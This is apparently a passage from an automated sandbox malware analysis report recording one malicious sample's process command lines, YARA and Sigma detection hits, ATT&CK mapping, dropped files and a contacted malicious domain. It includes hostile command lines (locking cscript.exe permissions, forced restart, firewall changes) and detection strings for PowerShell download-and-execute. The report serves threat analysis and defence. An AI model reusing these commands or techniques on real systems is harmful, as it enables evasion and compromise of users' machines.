takeown.exe (PID: 5504 cmdline: 'C:\Windows\SysWOW64\takeown.exe' /f C:\Windows\syswow64\cscript.exe MD5: 13FC919F91DAE13EA83970363CE170BD) conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cacls.exe (PID: 5268 cmdline: 'C:\Windows\SysWOW64\cacls.exe' C:\Windows\syswow64\cscript.exe /E /P everyone:N MD5: 4CBB1C027DF71C53A8EE4C855FD35B25) conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powercfg.exe (PID: 6092 cmdline: 'C:\Windows\SysWOW64\powercfg.exe' /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c MD5: FA313DB034098C26069DBADD6178DEB3) conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Copyright Joe Security LLC 2021 Page 6 of 44 powershell.exe (PID: 6072 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Start-Sleep -Seconds 900; Restart-Computer -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10) conhost.exe (PID: 3556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source Rule Description Author Strings C:\Users\user\Documents\20210824\PowerShell_transc PowerShell_Susp_Parame Detects Florian Roth 0x14a:$sa2: -EncodedCommand ript.061544.OIWNDrfK.20210824052843.txt ter_Combo PowerShell 0x103c:$sa2: -EncodedCommand invocation with 0x2239:$sa2: -EncodedCommand suspicious 0x33f6:$sa2: -EncodedCommand parameters 0x138:$sc1: -nop 0x102a:$sc1: -nop 0x2227:$sc1: -nop 0x33e4:$sc1: -nop 0x13d:$se2: -exec bypass 0x102f:$se2: -exec bypass 0x222c:$se2: -exec bypass 0x33e9:$se2: -exec bypass 0x13d:$se4: -exec bypass 0x102f:$se4: -exec bypass 0x222c:$se4: -exec bypass 0x33e9:$se4: -exec bypass

Memory Dumps

Source Rule Description Author Strings 00000002.00000002.508337108.0000000005057000.00000 Invoke_PSImage Detects a Florian Roth 0x1870:$: IEX([System.Text.Encoding]::ASCII.GetString( 004.00000001.sdmp command to 0x1fa0:$: IEX([System.Text.Encoding]::ASCII.GetString( execute PowerShell 0x150e4:$: IEX([System.Text.Encoding]::ASCII.GetString( from String 0x15814:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x15e4:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0x1d14:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0x14e58:$: System.Drawing.Bitmap((a Net.WebClient).Op enRead( 0x15588:$: System.Drawing.Bitmap((a Net.WebClient).Op enRead( 00000002.00000002.508576402.00000000050EF000.00000 Invoke_PSImage Detects a Florian Roth 0x173e:$: IEX([System.Text.Encoding]::ASCII.GetString( 004.00000001.sdmp command to 0x1e6e:$: IEX([System.Text.Encoding]::ASCII.GetString( execute PowerShell 0x32a2:$: IEX([System.Text.Encoding]::ASCII.GetString( from String 0x39d2:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x14b2:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0x1be2:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0x3016:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0x3746:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead(

Copyright Joe Security LLC 2021 Page 7 of 44 Source Rule Description Author Strings 00000002.00000002.508214967.0000000005009000.00000 Invoke_PSImage Detects a Florian Roth 0x20d6:$: IEX([System.Text.Encoding]::ASCII.GetString( 004.00000001.sdmp command to 0x2806:$: IEX([System.Text.Encoding]::ASCII.GetString( execute PowerShell 0xac56:$: IEX([System.Text.Encoding]::ASCII.GetString( from String 0xb462:$: IEX([System.Text.Encoding]::ASCII.GetString( 0xbc82:$: IEX([System.Text.Encoding]::ASCII.GetString( 0xc292:$: IEX([System.Text.Encoding]::ASCII.GetString( 0xc934:$: IEX([System.Text.Encoding]::ASCII.GetString( 0xd0c6:$: IEX([System.Text.Encoding]::ASCII.GetString( 0xd8d2:$: IEX([System.Text.Encoding]::ASCII.GetString( 0xf2ca:$: IEX([System.Text.Encoding]::ASCII.GetString( 0xfb86:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x103a6:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x109b6:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x11058:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x117ea:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x11ff6:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x1e4a:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0x257a:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0x6702:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0xb1b2:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 0xb9fa:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 00000002.00000002.508316918.0000000005052000.00000 Invoke_PSImage Detects a Florian Roth 0x2c44:$: IEX([System.Text.Encoding]::ASCII.GetString( 004.00000001.sdmp command to 0x3374:$: IEX([System.Text.Encoding]::ASCII.GetString( execute PowerShell 0x29b8:$: System.Drawing.Bitmap((a Net.WebClient).Ope from String nRead( 0x30e8:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( 00000002.00000002.508383686.000000000506E000.00000 Invoke_PSImage Detects a Florian Roth 0x1d10:$: IEX([System.Text.Encoding]::ASCII.GetString( 004.00000001.sdmp command to 0x2440:$: IEX([System.Text.Encoding]::ASCII.GetString( execute PowerShell 0x1a84:$: System.Drawing.Bitmap((a Net.WebClient).Ope from String nRead( 0x21b4:$: System.Drawing.Bitmap((a Net.WebClient).Ope nRead( Click to see the 4 entries

Sigma Overview

System Summary:

Sigma detected: Empire PowerShell Launch Parameters

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Suspicious Csc.exe Source File Folder

Sigma detected: Suspicious Certutil Command

Sigma detected: Conhost Parent Process Executions

Sigma detected: Non Interactive PowerShell

Jbx Signature Overview

Click to jump to signature section

System Summary:

Malicious sample detected (through community Yara rule)

Very long command line found

Uses powercfg.exe to modify the power settings

Copyright Joe Security LLC 2021 Page 8 of 44 HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Command and Windows Windows Masquerading 1 1 OS Security Software Remote Data from Exfiltration Encrypted Eavesdrop on Accounts Scripting Service 1 Service 1 Credential Discovery 1 Services Local Over Other Channel 2 Insecure Interpreter 1 1 Dumping System Network Network Medium Communication Default PowerShell 1 Services File Process Disable or Modify LSASS Process Discovery 2 Remote Data from Exfiltration Non- Exploit SS7 to Accounts Permissions Injection 1 2 Tools 1 Memory Desktop Removable Over Application Redirect Phone Weakness 1 Protocol Media Bluetooth Layer Calls/SMS Protocol 1 Domain At (Linux) DLL Side- Services File Virtualization/Sandbox Security Virtualization/Sandbox SMB/Windows Data from Automated Application Exploit SS7 to Accounts Loading 1 Permissions Evasion 2 1 Account Evasion 2 1 Admin Shares Network Exfiltration Layer Track Device Weakness 1 Manager Shared Protocol 2 Location Drive Local At (Windows) Logon Script DLL Side- Process NTDS Application Window Distributed Input Scheduled Protocol SIM Card Accounts (Mac) Loading 1 Injection 1 2 Discovery 1 Component Capture Transfer Impersonation Swap Object Model Cloud Cron Network Network Deobfuscate/Decode LSA Remote System SSH Keylogging Data Fallback Manipulate Accounts Logon Script Logon Script Files or Information 1 Secrets Discovery 1 Transfer Channels Device Size Limits Communication

Replication Launchd Rc.common Rc.common Services File Cached File and Directory VNC GUI Input Exfiltration Multiband Jamming or Through Permissions Domain Discovery 1 Capture Over C2 Communication Denial of Removable Weakness 1 Credentials Channel Service Media External Scheduled Task Startup Items Startup Items DLL Side-Loading 1 DCSync System Information Windows Web Portal Exfiltration Commonly Rogue Wi-Fi Remote Discovery 1 2 Remote Capture Over Used Port Access Points Services Management Alternative Protocol

Behavior Graph

Copyright Joe Security LLC 2021 Page 9 of 44 Hide Legend Behavior Graph

ID: 470361 Cookbook: defaultwindowscmdlinecookbook.jbs Legend: Startdate: 24/08/2021 Architecture: WINDOWS Score: 84 Process Signature

6fz.one Created File started started started

Malicious sample detected Sigma detected: Suspicious Sigma detected: Empire DNS/IP Info (through community Yara PowerShell Parameter 2 other signatures PowerShell Launch Parameters rule) Substring Is Dropped

cmd.exe msiexec.exe msiexec.exe Is Windows Process

1 1 1 Number of created Registry Values

192.168.2.1 Number of created Files unknown unknown Visual Basic started started started started started

Uses netsh to modify Encrypted powershell Uses powercfg.exe to the Windows network cmdline option found modify the power settings Delphi and firewall settings Java

powershell.exe conhost.exe netsh.exe netsh.exe netsh.exe

30 other processes .Net C# or VB.NET

15 18 C, C++ or other language

6fz.one

104.21.0.250, 443, 49681, 49682 Is malicious CLOUDFLARENETUS United States Internet started started started started started started started

Very long command line Encrypted powershell found cmdline option found

powershell.exe conhost.exe conhost.exe conhost.exe conhost.exe conhost.exe conhost.exe

25 other processes

29

dropped

C:\Users\user\AppData\...\hjp55l32.cmdline, UTF-8 started started started

csc.exe conhost.exe conhost.exe

3

dropped

C:\Users\user\AppData\Local\...\hjp55l32.dll, PE32 started started

cvtres.exe conhost.exe

1

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Copyright Joe Security LLC 2021 Page 10 of 44 Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source Detection Scanner Label Link crl.m 0% URL Reputation safe pesterbdd.com/images/Pester.png 0% URL Reputation safe https://6fz.one/d.php?i=16t 0% Avira URL Cloud safe https://go.micro 0% URL Reputation safe https://6fz.one/d.php?i=16 0% Avira URL Cloud safe

Copyright Joe Security LLC 2021 Page 11 of 44 Source Detection Scanner Label Link https://contoso.com/ 0% URL Reputation safe www.microsoft.co 0% URL Reputation safe https://contoso.com/License 0% URL Reputation safe https://6fz.one/d.php?i=1t 0% Avira URL Cloud safe https://contoso.com/Icon 0% URL Reputation safe https://6fz.one/d.php?i=2 0% Avira URL Cloud safe https://6fz.one/d.php?i=1 0% Avira URL Cloud safe https://6fz.one/d.php?i=3 0% Avira URL Cloud safe https://6fz.one 0% Avira URL Cloud safe

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation 6fz.one 104.21.0.250 true false unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP Domain Country Flag ASN ASN Name Malicious 104.21.0.250 6fz.one United States 13335 CLOUDFLARENETUS false

Private

IP 192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond Analysis ID: 470361 Start date: 24.08.2021 Start time: 05:27:26 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 7m 23s Hypervisor based Inspection enabled: false Report type: light Cookbook file name: defaultwindowscmdlinecookbook.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes 86 analysed: Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL

Copyright Joe Security LLC 2021 Page 12 of 44 Classification: mal84.evad.win@111/45@3/2 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Warnings: Show All

Simulations

Behavior and APIs

Time Type Description 05:28:31 API Interceptor 105x Sleep call for process: powershell.exe modified 05:29:24 API Interceptor 1x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 104.21.0.250 PBCh1LQrQT.exe Get hash malicious Browse www.searc hlakeconro ehomes.com /wufn/?5j= PMoU3Bb60u mbJ9nm9Lu9 lk9x8XSdLD PlrCt++bti 7zRCL3goWI AjDJ2GDCa1 ICpzF5Wi&h TND=p2MTzn YaRh8PG41y.exe Get hash malicious Browse www.searc hlakeconro ehomes.com /wufn/?EZw xI0z8=PMoU 3Bb60umbJ9 nm9Lu9lk9x 8XSdLDPlrC t++bti7zRC L3goWIAjDJ 2GDCafXyZz B7ei&WH=3f uXGd

Domains

No context

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context CLOUDFLARENETUS SecuriteInfo.com.Trojan.Win32.Save.a.7308.exe Get hash malicious Browse 104.21.19.200 DUsM8INDiD.exe Get hash malicious Browse 172.67.183.125 tim.dll Get hash malicious Browse 104.26.6.139 IFsT94qu8G.exe Get hash malicious Browse 172.67.142.91 Vl4JzTDzmQ.exe Get hash malicious Browse 162.159.12 8.233 SKj2xw6rtb.exe Get hash malicious Browse 162.159.13 7.232 BT1tlwpfkU.exe Get hash malicious Browse 162.159.13 8.232

Copyright Joe Security LLC 2021 Page 13 of 44 Match Associated Sample Name / URL SHA 256 Detection Link Context 0rRGEsopLg.exe Get hash malicious Browse 162.159.13 8.232 wzdsCqA9rv.exe Get hash malicious Browse 172.67.75.172 F3hrptTSsK.exe Get hash malicious Browse 162.159.13 5.232 wrD6C91ijg.exe Get hash malicious Browse 162.159.12 9.233 OZixe06aPK.exe Get hash malicious Browse 162.159.13 7.232 axbSBfbrX5.exe Get hash malicious Browse 162.159.13 6.232 cfcb21c8c129c8c2c525ecfac8bd883260eda6038e399.exe Get hash malicious Browse 104.21.84.205 ps333.dll Get hash malicious Browse 104.20.184.68 Details-064518_20210823.xlsb Get hash malicious Browse 162.159.13 3.233 Details-064518_20210823.xlsb Get hash malicious Browse 162.159.13 0.233

Teklif Talebi.pdf.exe Get hash malicious Browse 104.21.19.200 .htm Get hash malicious Browse 104.16.19.94 LrFpF5eVch.exe Get hash malicious Browse 162.159.13 5.233

JA3 Fingerprints

Match Associated Sample Name / URL SHA 256 Detection Link Context bd0bf25947d4a37404f0424edf4db9ad oGgH8vgU0Z.exe Get hash malicious Browse 104.21.0.250 btweb_installer.exe Get hash malicious Browse 104.21.0.250 codes.zip.exe Get hash malicious Browse 104.21.0.250 r6.zip.exe Get hash malicious Browse 104.21.0.250 installer_20f7d5a8ce373.exe Get hash malicious Browse 104.21.0.250 eQjZ5OS5m5.exe Get hash malicious Browse 104.21.0.250 vape_all_versions.zip.exe Get hash malicious Browse 104.21.0.250 script_hack_412.zip.exe Get hash malicious Browse 104.21.0.250 DesktopCentralAgent.exe Get hash malicious Browse 104.21.0.250 orbi-valorant-injector.exe Get hash malicious Browse 104.21.0.250 Agenda1.docx Get hash malicious Browse 104.21.0.250 SecuriteInfo.com.BackDoor.Rat.281.18292.exe Get hash malicious Browse 104.21.0.250 FragCache Hack v47.zip.exe Get hash malicious Browse 104.21.0.250 DesktopCentralAgent.exe Get hash malicious Browse 104.21.0.250 eBay-invoice-2195921.vbs Get hash malicious Browse 104.21.0.250 DCCLOUDTEST_Agent.exe Get hash malicious Browse 104.21.0.250 DCCLOUDTEST_Agent.exe Get hash malicious Browse 104.21.0.250 yQ3bcGuTtV.exe Get hash malicious Browse 104.21.0.250 ashwinds_Agent.exe Get hash malicious Browse 104.21.0.250 AGENT_223264_V10_9_17_RW.EXE Get hash malicious Browse 104.21.0.250 54328bd36c14bd82ddaa0c04b25ed9ad PO#24-RFX-018RMH426.exe Get hash malicious Browse 104.21.0.250 SecuriteInfo.com.Trojan.Win32.Save.a.7308.exe Get hash malicious Browse 104.21.0.250 wrD6C91ijg.exe Get hash malicious Browse 104.21.0.250 Invoice#4110.vbs Get hash malicious Browse 104.21.0.250 Teklif Talebi.pdf.exe Get hash malicious Browse 104.21.0.250 BL-COA-PL-CI_09876543234456787rcs.exe Get hash malicious Browse 104.21.0.250 OBL PN210700369.pdf.exe Get hash malicious Browse 104.21.0.250 Proforma Invoice -no3526457h.exe Get hash malicious Browse 104.21.0.250 MACHINE SPECIFICATION.exe Get hash malicious Browse 104.21.0.250 rfq-order required 00r42.exe Get hash malicious Browse 104.21.0.250 hesaphareketi-01.pdf.exe Get hash malicious Browse 104.21.0.250 m8UMZj0kUc.exe Get hash malicious Browse 104.21.0.250 hesaphareketi-01.pdf.exe Get hash malicious Browse 104.21.0.250 D0xCo7VJZ4.exe Get hash malicious Browse 104.21.0.250 O41AdhDgby.exe Get hash malicious Browse 104.21.0.250 ofm5vnlOy4.exe Get hash malicious Browse 104.21.0.250 x7AwL2FI1Q.exe Get hash malicious Browse 104.21.0.250 swift copy.exe Get hash malicious Browse 104.21.0.250 SKLCL21080236_pdf.exe Get hash malicious Browse 104.21.0.250 Transfer receipt Copy 1038690332210516.exe Get hash malicious Browse 104.21.0.250

Copyright Joe Security LLC 2021 Page 14 of 44 Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: data Category: modified Size (bytes): 14734 Entropy (8bit): 4.993014478972177 Encrypted: false SSDEEP: 384:wZvOdB8Ypib4JNXp59PVoGIpN6KQkj2dAYotiQ0HzAF8:UvOdB8YNNZjPV3IpNBQkj2dAYotinHzr MD5: D96346051D2D86BEE0F5D3BE7C1366A4 SHA1: 65ED0D1C95151F57B0692E4370BFE43255DE19B9 SHA-256: 354A7096B260FC9F1D57BF2FD154C9D214D18C08B075149C7F2708098D4EA636 SHA-512: 3705927BDA281E6FC85264542BBBC93475FA1F7CFCFE81F930895DBF683B8C059553E6A6F04AF338C1B1C2BF5D79C361C9700D46B819577798C970B03B4BE6CA Malicious: false Preview: PSMODULECACHE...... #y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1...... Start-BitsTransfer...... Set-BitsTransfer ...... Get-BitsTransfer...... Resume-BitsTransfer...... Add-BitsFile...... Suspend-BitsTransfer...... Complete-BitsTransfer...... Remove-BitsTransfer...... -.^(...[...C:\Win dows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy...... Unregister-App BackgroundTask...... Get-AppBackgroundTask...... tid...... pfn...... iru....%...Enable-AppBackgroundTaskDiagnosticLog...... Start-AppBackgroundTask....&...Disable-Ap pBackgroundTaskDiagnosticLog...... w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1...... Unregister-PackageSource...... Save-Package...... Install-PackageProvider...... Find-PackageProvider...... Install-Package...... Get-PackageProvider...... Get-Pac kage...... Unins

C:\Users\user\AppData\Local\Temp\RES2CD4.tmp Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File Type: data Category: dropped Size (bytes): 2196 Entropy (8bit): 2.737924021577132 Encrypted: false SSDEEP: 24:BpHIkKH2hK8qQflI+ycuZhNndakSeyPNnq9epvK9oB:BpZKMK8qQ91ulnda3eeq9sB MD5: 2490F95C4ABB862ABA146B7CF447A5E1 SHA1: 26168C41796C36ECC5D9F5A13034BA1598352F6E SHA-256: 266ED270DF94B86D0CD870D7E07263CC0B6C46CD8577EF2794B5F4F4E5387F4F SHA-512: 29F66D530A633AFBF5602E4DAD786C623245DE263FFC4CDDF0B4CB867153DFC018BFBDD69B5F00C17DBC2A94062D24179F06598DE4903877A3AA32B08C5D802 0 Malicious: false Preview: ...... U....c:\Users\user\AppData\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP...... fI..f...... 5...... C:\Users\user\AppData\Loc al\Temp\RES2CD4.tmp.-.<...... '...Microsoft (R) CVTRES.d.=..cwd.C:\Program Files (x86)\AutoIt3.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvt res.exe......

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4ksxptp.gfo.psm1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

Copyright Joe Security LLC 2021 Page 15 of 44 C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qftbkgyi.p50.psm1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_seh1mxce.3dz.psm1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttyv11rl.vz4.ps1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vr0sx14d.kdh.ps1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

Copyright Joe Security LLC 2021 Page 16 of 44 C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjqaex00.s0q.ps1 Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: very short file (no magic) Category: dropped Size (bytes): 1 Entropy (8bit): 0.0 Encrypted: false SSDEEP: 3:U:U MD5: C4CA4238A0B923820DCC509A6F75849B SHA1: 356A192B7913B04C54574D18C28D46E6395428AB SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510 A Malicious: false Preview: 1

C:\Users\user\AppData\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File Type: MSVC .res Category: dropped Size (bytes): 652 Entropy (8bit): 3.1215042136699678 Encrypted: false SSDEEP: 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry9dak7YnqqeyPN5Dlq5J:+RI+ycuZhNndakSeyPNnqX MD5: 20F5A6AACD0F664991F066FFA2D3E58F SHA1: 49C18F53F445D00FC9785C8B2A1488250F773E8A SHA-256: 0164ABDBF65CD2C8BFBE1073B449AC787196947ED178F6BFD750CFAA222D6C99 SHA-512: 4E46156D419DB0E75850972E854B327868FADD8C4912A071FA782777DDBECC079225FE5994BB07E1A21D5F66C5BB1C1F50C92556622FE4B78433E994E8B42441 Malicious: false Preview: ...... L...<...... 0...... L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...... ?...... D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...... S.t.r.i.n.g.F.i.l.e.I.n.f.o...... 0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n...... 0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.j.p.5.5.l.3.2...d.l.l.....(... ..L.e.g.a.l.C.o.p.y.r.i.g.h.t...... D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.j.p.5.5.l.3.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0... 0...0...0...

C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.0.cs Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Category: dropped Size (bytes): 354 Entropy (8bit): 5.106255627163809 Encrypted: false SSDEEP: 6:V/DsDrDCSvSKgF+SAUF3SR9QbKHDHtLDMWfDoFSRFQgLluLiA:V/DGrOEgFw9IihVkEFQwu1 MD5: 5CC66596055771B708C426B09785ED18 SHA1: FE11BE68B5F5F01304E2C6B62458BA70CCC9A575 SHA-256: 530C7292814FA916AA2846672D0BD17CB4BA54CB8F4F61B9D84E01A51B857C08 SHA-512: DC0C9385A85ADE45584FC782DE2AB285D5CEB535D0EF6D19B610E34C1FDE5E6E76FC88D0B6B0E9F922562C4FE26AAACCF6204FAE5053E3679F3A104CBF2DF D5C Malicious: false Preview: .using System;..using System.Diagnostics;..using System.Runtime.InteropServices;..public static class PF88dNcdsDDqe7Zf..{..[DllImport("msi.dll", CharSet=CharSet .Auto)]..public static extern int MsiInstallProduct(string packagePath, string commandLine);..[DllImport("msi.dll")]..public static extern int MsiSetInternalUI(int dwUILevel, IntPtr phWnd);..}

C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.cmdline

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Category: dropped Size (bytes): 371 Entropy (8bit): 5.282666538949866 Encrypted: false SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fLTGzxs7+AEszI923fLTb:p37Lvkmb6KzTSWZE2TX MD5: FF7F7C72C43FCBB7A6CAF84A179E3F5C SHA1: FF359B4613CA625896FF99FAAD1BEE78AA593C34 SHA-256: AE4777AEAFFD6C17E1D4DB8FF05CCE3CB0040AD29C149583A9F0CCB08096A74C SHA-512: 485544D5ED120279FC159FEBED5AB05694DA76F4E01CE8C8C9F685578422947FBF89B716A8649D20AAC82C487C9B4794F9DE45ED3EE7A8F4AC1CA3ACC9A2DE 7C

Copyright Joe Security LLC 2021 Page 17 of 44 C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.cmdline

Malicious: true Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\Sys tem.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.dll" /debug- /optimize+ /warnaserror /optimize+ "C :\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.0.cs"

